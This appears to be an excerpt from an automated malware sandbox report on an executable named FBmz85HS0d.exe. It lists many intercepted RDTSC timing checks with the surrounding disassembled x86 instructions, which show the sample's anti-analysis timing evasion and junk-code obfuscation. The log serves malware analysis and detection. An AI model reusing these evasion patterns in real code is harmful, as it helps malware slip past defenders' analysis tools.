                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 5573C7 second address: 5573E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F4EF0C79888h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4EF0C7988Bh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 564DA0 second address: 564DA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 564DA4 second address: 564DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 564DAA second address: 564DB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F4EF0C09E16h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 571A1D second address: 571A34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4EF0C79892h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 571A34 second address: 571A55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4EF0C09E21h 0x00000009 jmp 00007F4EF0C09E1Ch 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 587315 second address: 587333 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4EF0C79886h 0x00000008 jmp 00007F4EF0C79891h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 587333 second address: 587339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 5863D4 second address: 5863D9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 5863D9 second address: 5863E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 5863E4 second address: 586427 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4EF0C79886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d je 00007F4EF0C79888h 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4EF0C79898h 0x0000001c jmp 00007F4EF0C79894h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 586583 second address: 586589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 586589 second address: 58658D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 58658D second address: 586591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 586721 second address: 586735 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4EF0C79886h 0x00000008 jno 00007F4EF0C79886h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 586F14 second address: 586F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4EF0C09E16h 0x0000000a ja 00007F4EF0C09E16h 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 pushad 0x00000016 jmp 00007F4EF0C09E29h 0x0000001b push edi 0x0000001c ja 00007F4EF0C09E16h 0x00000022 pop edi 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 pushad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 58B616 second address: 58B61B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 58B66C second address: 58B670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 58B670 second address: 58B699 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+124674AFh], edi 0x00000010 mov dx, si 0x00000013 push 00000004h 0x00000015 clc 0x00000016 sub dx, 4D17h 0x0000001b call 00007F4EF0C79889h 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 pop eax 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 58B699 second address: 58B6FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F4EF0C09E29h 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007F4EF0C09E24h 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F4EF0C09E22h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 58B6FA second address: 58B72B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4EF0C7988Fh 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007F4EF0C7988Dh 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c push edx 0x0000001d pop edx 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 58B960 second address: 58B9C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jng 00007F4EF0C09E16h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F4EF0C09E18h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 push dword ptr [ebp+12455F54h] 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007F4EF0C09E18h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 ja 00007F4EF0C09E1Ch 0x0000004d push C08624F7h 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 push esi 0x00000057 pop esi 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 58B9C8 second address: 58B9D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C7988Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 58B9D9 second address: 58B9DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 58B9DF second address: 58B9E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 58D1DB second address: 58D1DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4AD426 second address: 4AD43A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4EF0C7988Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F50354 second address: 4F5035A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F5035A second address: 4F50372 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C7988Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov si, C5D3h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F50372 second address: 4F50377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F50377 second address: 4F503CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C7988Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F4EF0C79896h 0x0000000f mov ebp, esp 0x00000011 jmp 00007F4EF0C79890h 0x00000016 mov edx, dword ptr [ebp+0Ch] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F4EF0C79897h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F503CF second address: 4F503FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4EF0C09E1Dh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F7064E second address: 4F70654 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F70654 second address: 4F70663 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F70663 second address: 4F70680 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C79899h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F70680 second address: 4F706A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dh, A0h 0x00000011 mov dx, si 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F706A1 second address: 4F706B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4EF0C7988Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F706B1 second address: 4F706BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F706BD second address: 4F70762 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F4EF0C79895h 0x0000000c sub eax, 0B0AC756h 0x00000012 jmp 00007F4EF0C79891h 0x00000017 popfd 0x00000018 popad 0x00000019 mov dword ptr [esp], esi 0x0000001c pushad 0x0000001d mov al, B2h 0x0000001f mov cx, di 0x00000022 popad 0x00000023 lea eax, dword ptr [ebp-04h] 0x00000026 jmp 00007F4EF0C7988Bh 0x0000002b nop 0x0000002c jmp 00007F4EF0C79896h 0x00000031 push eax 0x00000032 jmp 00007F4EF0C7988Bh 0x00000037 nop 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007F4EF0C79894h 0x0000003f sbb cx, 6E38h 0x00000044 jmp 00007F4EF0C7988Bh 0x00000049 popfd 0x0000004a mov di, ax 0x0000004d popad 0x0000004e push dword ptr [ebp+08h] 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F70762 second address: 4F70766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F70766 second address: 4F7077D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C79893h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F707A5 second address: 4F707C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F4EF0C09E29h 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F707C4 second address: 4F707D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4EF0C7988Ch 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F707D6 second address: 4F70818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 cmp dword ptr [ebp-04h], 00000000h 0x0000000b pushad 0x0000000c mov ebx, 13EEB4A0h 0x00000011 mov edi, 109A7ACCh 0x00000016 popad 0x00000017 mov esi, eax 0x00000019 pushad 0x0000001a movsx ebx, si 0x0000001d movzx esi, dx 0x00000020 popad 0x00000021 je 00007F4EF0C09E92h 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F4EF0C09E27h 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F70818 second address: 4F7081C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F7081C second address: 4F70822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F70822 second address: 4F70828 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F70828 second address: 4F7082C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F70851 second address: 4F70855 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F70855 second address: 4F7085B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F7085B second address: 4F708CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4EF0C7988Ch 0x00000008 pop eax 0x00000009 jmp 00007F4EF0C7988Bh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, esi 0x00000013 pushad 0x00000014 jmp 00007F4EF0C7988Bh 0x00000019 popad 0x0000001a pop esi 0x0000001b pushad 0x0000001c pushad 0x0000001d mov esi, 006F4511h 0x00000022 jmp 00007F4EF0C7988Eh 0x00000027 popad 0x00000028 jmp 00007F4EF0C79892h 0x0000002d popad 0x0000002e leave 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F4EF0C79897h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F708CC second address: 4F60020 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d cmp eax, 00000000h 0x00000010 setne al 0x00000013 jmp 00007F4EF0C09E12h 0x00000015 xor ebx, ebx 0x00000017 test al, 01h 0x00000019 jne 00007F4EF0C09E17h 0x0000001b sub esp, 04h 0x0000001e mov dword ptr [esp], 0000000Dh 0x00000025 call 00007F4EF589740Bh 0x0000002a mov edi, edi 0x0000002c pushad 0x0000002d jmp 00007F4EF0C09E1Ch 0x00000032 mov ax, 9DE1h 0x00000036 popad 0x00000037 xchg eax, ebp 0x00000038 pushad 0x00000039 mov di, cx 0x0000003c push eax 0x0000003d push edx 0x0000003e mov ecx, 1C849BDBh 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F60020 second address: 4F60053 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4EF0C79890h 0x00000008 and cx, 3DA8h 0x0000000d jmp 00007F4EF0C7988Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov cx, 3C31h 0x0000001e movzx eax, di 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F60053 second address: 4F600B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4EF0C09E26h 0x00000009 sbb esi, 15722B38h 0x0000000f jmp 00007F4EF0C09E1Bh 0x00000014 popfd 0x00000015 mov bx, cx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d pushad 0x0000001e mov edx, esi 0x00000020 call 00007F4EF0C09E1Ah 0x00000025 pop ecx 0x00000026 popad 0x00000027 mov esi, edi 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f jmp 00007F4EF0C09E26h 0x00000034 mov dx, si 0x00000037 popad 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F600B8 second address: 4F600C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4EF0C7988Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F600C6 second address: 4F600CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F600CA second address: 4F600DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 2Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F600DB second address: 4F600F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F600F3 second address: 4F601A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, bh 0x00000005 pushfd 0x00000006 jmp 00007F4EF0C7988Ah 0x0000000b jmp 00007F4EF0C79895h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xchg eax, ebx 0x00000015 pushad 0x00000016 mov ax, C683h 0x0000001a mov ax, 47DFh 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007F4EF0C79895h 0x00000025 xchg eax, ebx 0x00000026 pushad 0x00000027 push esi 0x00000028 pop edi 0x00000029 mov ecx, 6E711ADBh 0x0000002e popad 0x0000002f xchg eax, edi 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F4EF0C7988Ch 0x00000037 sbb ax, 10A8h 0x0000003c jmp 00007F4EF0C7988Bh 0x00000041 popfd 0x00000042 pushfd 0x00000043 jmp 00007F4EF0C79898h 0x00000048 or cx, 0308h 0x0000004d jmp 00007F4EF0C7988Bh 0x00000052 popfd 0x00000053 popad 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007F4EF0C79894h 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F601DA second address: 4F601DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F601DE second address: 4F601E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F601E4 second address: 4F601EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F601EA second address: 4F601EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F601EE second address: 4F60223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub ebx, ebx 0x0000000a jmp 00007F4EF0C09E23h 0x0000000f sub edi, edi 0x00000011 jmp 00007F4EF0C09E1Fh 0x00000016 inc ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F60223 second address: 4F60229 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F60229 second address: 4F60264 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test al, al 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edi, ecx 0x0000000f pushfd 0x00000010 jmp 00007F4EF0C09E28h 0x00000015 adc esi, 2E230218h 0x0000001b jmp 00007F4EF0C09E1Bh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F60350 second address: 4F60356 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F60356 second address: 4F6035A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F6035A second address: 4F6038B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C7988Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4EF0C79898h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F6038B second address: 4F6038F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F6038F second address: 4F60395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F60395 second address: 4F603DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F4F61707EFBh 0x0000000f jmp 00007F4EF0C09E20h 0x00000014 js 00007F4EF0C09E77h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F4EF0C09E27h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F603DC second address: 4F603E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F603E2 second address: 4F603E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F603E6 second address: 4F6042D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-14h], edi 0x0000000b jmp 00007F4EF0C79897h 0x00000010 jne 00007F4F61777919h 0x00000016 jmp 00007F4EF0C79896h 0x0000001b mov ebx, dword ptr [ebp+08h] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F6042D second address: 4F60431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
